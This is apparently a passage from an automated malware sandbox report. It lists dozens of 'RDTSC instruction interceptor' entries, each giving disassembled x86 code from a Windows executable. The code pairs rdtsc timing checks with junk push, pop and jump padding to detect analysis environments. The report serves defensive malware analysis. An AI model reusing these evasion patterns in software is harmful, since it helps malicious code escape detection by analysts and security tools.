0x00000064 je 00007F5AF4D0D7C6h 0x0000006a jmp 00007F5AF4D0D7CDh 0x0000006f popad 0x00000070 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416AC5 second address: 416ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416ACB second address: 416AFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F5AF4D0D7D4h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416AFC second address: 416B19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF500675Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F5AF500675Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416B19 second address: 416B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416B1D second address: 416B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF5006767h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416B38 second address: 416B59 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5AF4D0D7C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 je 00007F5AF4D0D7C6h 0x00000018 pop ecx 0x00000019 jl 00007F5AF4D0D7CCh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416BDD second address: 416BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F5AF5006766h 0x0000000f jmp 00007F5AF5006760h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416BFC second address: 416C72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D1A31h], edx 0x00000010 push 00000000h 0x00000012 mov si, di 0x00000015 call 00007F5AF4D0D7C9h 0x0000001a push edx 0x0000001b jmp 00007F5AF4D0D7D5h 0x00000020 pop edx 0x00000021 push eax 0x00000022 jmp 00007F5AF4D0D7D8h 0x00000027 mov eax, dword ptr [esp+04h] 0x0000002b je 00007F5AF4D0D7CEh 0x00000031 jne 00007F5AF4D0D7C8h 0x00000037 mov eax, dword ptr [eax] 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c js 00007F5AF4D0D7C6h 0x00000042 pop eax 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416C72 second address: 416C7C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5AF500675Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416C7C second address: 416C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416C8B second address: 416CD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F5AF5006758h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000003h 0x00000024 mov dh, D8h 0x00000026 push 00000000h 0x00000028 mov esi, dword ptr [ebp+122D3708h] 0x0000002e push 00000003h 0x00000030 mov dx, di 0x00000033 mov edi, dword ptr [ebp+122D3774h] 0x00000039 call 00007F5AF5006759h 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416CD7 second address: 416CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF4D0D7CFh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416CEB second address: 416CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5AF5006756h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416CFE second address: 416D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d jns 00007F5AF4D0D7C8h 0x00000013 pop esi 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007F5AF4D0D7D2h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007F5AF4D0D7CEh 0x00000024 pop eax 0x00000025 call 00007F5AF4D0D7CCh 0x0000002a mov edx, 520F23B1h 0x0000002f pop edi 0x00000030 lea ebx, dword ptr [ebp+1244D690h] 0x00000036 mov dword ptr [ebp+122D2352h], eax 0x0000003c push eax 0x0000003d jo 00007F5AF4D0D7D0h 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 428B35 second address: 428B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5AF5006768h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 436123 second address: 436130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F5AF4D0D7D2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FDF5F second address: 3FDF65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FDF65 second address: 3FDF6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ebx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434172 second address: 434195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F5AF5006756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5AF500675Fh 0x00000013 jng 00007F5AF5006756h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434195 second address: 4341C5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c popad 0x0000000d push esi 0x0000000e pushad 0x0000000f jnp 00007F5AF4D0D7C6h 0x00000015 jl 00007F5AF4D0D7C6h 0x0000001b jmp 00007F5AF4D0D7CCh 0x00000020 popad 0x00000021 jne 00007F5AF4D0D7D2h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434346 second address: 434396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF5006760h 0x00000007 pushad 0x00000008 jl 00007F5AF5006756h 0x0000000e jl 00007F5AF5006756h 0x00000014 jmp 00007F5AF5006766h 0x00000019 jmp 00007F5AF500675Bh 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 pushad 0x00000022 je 00007F5AF5006758h 0x00000028 push esi 0x00000029 pop esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434396 second address: 43439A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43439A second address: 4343C2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F5AF5006765h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5AF500675Bh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4343C2 second address: 4343C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4344EF second address: 4344F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434651 second address: 434665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF4D0D7CEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434665 second address: 43466B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4347E7 second address: 4347F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF4D0D7CBh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4347F7 second address: 4347FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434DB4 second address: 434DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434DB9 second address: 434DC3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5AF500675Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434DC3 second address: 434DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jne 00007F5AF4D0D7C6h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F5AF4D0D7D4h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434DEC second address: 434E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF5006768h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434E0D second address: 434E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434E11 second address: 434E1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF500675Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434E1F second address: 434E29 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5AF4D0D7CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434E29 second address: 434E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007F5AF5006756h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43588B second address: 4358B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5AF4D0D7CCh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4358B4 second address: 4358B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435A17 second address: 435A1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435A1C second address: 435A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5AF5006756h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43D082 second address: 43D0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F5AF4D0D7CBh 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jmp 00007F5AF4D0D7CEh 0x00000017 pop ecx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43D0A9 second address: 43D0CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF500675Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F5AF5006761h 0x00000013 jmp 00007F5AF500675Bh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43D0CF second address: 43D0D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43D0D4 second address: 43D0FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007F5AF500675Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5AF500675Bh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43D0FE second address: 43D102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43D364 second address: 43D36E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5AF5006756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43D36E second address: 43D380 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5AF4D0D7C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43D380 second address: 43D385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43E64B second address: 43E64F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442FD6 second address: 442FDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442FDC second address: 443000 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 443000 second address: 443004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 443004 second address: 443029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF4D0D7D9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442678 second address: 44267E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44267E second address: 4426C4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5AF4D0D7C6h 0x00000008 jmp 00007F5AF4D0D7D1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F5AF4D0D7D1h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5AF4D0D7D6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4426C4 second address: 4426C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4426C8 second address: 4426D1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442AF1 second address: 442B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F5AF5006771h 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F5AF5006769h 0x00000012 ja 00007F5AF500675Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442E1C second address: 442E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jno 00007F5AF4D0D7C6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jg 00007F5AF4D0D7C6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442E35 second address: 442E4F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5AF5006756h 0x00000008 jnl 00007F5AF5006756h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007F5AF500675Eh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442E4F second address: 442E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F5AF4D0D7CCh 0x0000000c jc 00007F5AF4D0D7C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442E65 second address: 442E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 443E0F second address: 443E2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F5AF4D0D7C6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 443E7F second address: 443E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 443E83 second address: 443E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5AF4D0D7D0h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4449E6 second address: 4449EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4449EA second address: 444A05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 444AAE second address: 444AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 xchg eax, ebx 0x00000007 jmp 00007F5AF500675Bh 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jmp 00007F5AF500675Bh 0x00000015 pop esi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 444F0F second address: 444F20 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007F5AF4D0D7C6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 444F20 second address: 444F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 445D2B second address: 445D3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF4D0D7CCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 445D3B second address: 445D49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 448419 second address: 44849E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5AF4D0D7C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d xor esi, dword ptr [ebp+122D3548h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F5AF4D0D7C8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov si, A1B0h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F5AF4D0D7C8h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f mov dword ptr [ebp+122D2831h], ecx 0x00000055 push eax 0x00000056 jp 00007F5AF4D0D7E4h 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F5AF4D0D7D6h 0x00000063 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 448E65 second address: 448E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5AF5006760h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44A36A second address: 44A36E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44A36E second address: 44A374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44A374 second address: 44A382 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44A382 second address: 44A387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44A13C second address: 44A140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44F453 second address: 44F457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44E671 second address: 44E68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F5AF4D0D7CEh 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44F4F4 second address: 44F4F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44F4F9 second address: 44F4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 450302 second address: 450308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
